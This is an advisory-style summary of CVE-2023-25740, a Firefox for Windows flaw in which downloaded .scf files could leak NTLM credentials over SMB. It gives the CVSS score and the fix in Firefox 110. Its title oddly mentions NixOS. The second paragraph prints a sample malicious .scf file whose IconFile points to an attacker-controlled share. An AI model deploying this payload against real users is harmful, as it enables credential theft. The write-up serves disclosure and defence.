CVE-2023-25740: 
NixOS vulnerability analysis and mitigation

CVE-2023-25740 is a security vulnerability affecting Firefox for Windows versions prior to 110. The vulnerability was discovered by Axel Chong (@Haxatron) and disclosed in February 2023. The issue involves the handling of Windows .scf (Shell Command Files) scripts, where after downloading such a file from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system (Mozilla Advisory).

The vulnerability has been assigned a CVSS v3.1 base score of 8.8 (HIGH) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. The issue specifically involves the IconFile parameter in .SCF files, which can trigger automatic SMB connections when viewed in the file folder. A sample exploit could be crafted using a malicious .scf file with the following structure: [Shell] Command=2 IconFile=//attacker-ip/share/pentestlab.ico [Taskbar] Command=ToggleDesktop (Mozilla Bug).

The vulnerability could lead to the leakage of NTLM credentials to a remote resource when a user simply views the folder containing the downloaded .scf file. This security issue only affects Firefox running on Windows systems, with other operating systems remaining unaffected (Mozilla Advisory).

The vulnerability was fixed in Firefox version 110. Users are advised to update their Firefox installations to this version or later. The fix was also backported to Firefox ESR 102.8+. The solution involved adding .scf files to the browser's local block-list, similar to the fix implemented for .url files (Mozilla Advisory).